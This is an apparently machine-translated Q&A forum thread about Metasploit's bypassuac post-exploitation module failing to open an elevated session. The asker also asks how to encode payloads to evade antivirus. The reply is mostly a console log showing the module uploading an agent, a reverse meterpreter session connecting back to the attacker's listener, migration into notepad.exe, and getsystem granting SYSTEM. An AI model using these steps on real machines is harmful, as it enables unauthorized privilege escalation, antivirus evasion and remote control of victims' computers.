0

post/windows/escalate/bypassuac が失敗するようです

何らかの理由で、ポスト エクスプロイト モジュール bypassuac を動作させることができません。これは私がしたことです:

  1. ターゲット マシンで meterpreter セッションを開きました (NETWORKSERVICE ユーザーとして)
  2. セッションをバックグラウンドにする

  3. 次のようなポスト エクスプロイト モジュールを使用しようとしました。

    post/windows/escalate/bypassuac を使用 set SESSION 1 set LHOST 192.168.1.100 set LPORT 4444 エクスプロイト

  4. ポートはまだ使用されていないため、問題ないはずです。

  5. 出力は次のとおりです。

    [-] ハンドラーが 192.168.1.100:4444 にバインドできませんでした[ ] 0.0.0.0:4444でリバース ハンドラーを開始しました [ ] ペイロード ハンドラーを開始しています... [ ]バイパス UAC 実行可能ファイルをファイルシステムにアップロードしています... [ ] Meterpreter ステージャー実行可能ファイル 73802 バイトがアップロードされています.. [ ] エージェントをファイルシステムにアップロードしました.... [ ] ポストモジュールの実行が完了しました

  6. その後、コンソールに戻り、何もせず、新しいセッションも何もしません。

次のことを確認しました。

  1. 実行可能ファイル bypassuac-x86.exe を手動でターゲットにアップロードします。それは完全にうまくいきました。
  2. ウィルススキャナの警告ベルが実行可能ファイルから鳴らなかったかどうかを確認しました。彼らはしませんでした

実行可能ファイルを手動で実行する方法はありますか?システムレベルのアクセスで新しいメータープリターセッションを開く方法を誰かが説明してくれませんか?

または、何らかの方法でペイロードをエンコードし、カスタム テンプレートを使用してすべてのウイルス対策の可能性を回避できますか? エクスプロイト後のモジュールをエンコードするオプションはまだ見つかりません。

前もって感謝します

ハルバー

4

1 に答える 1

-2 
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo
于 2014-01-15T04:26:31.043 に答える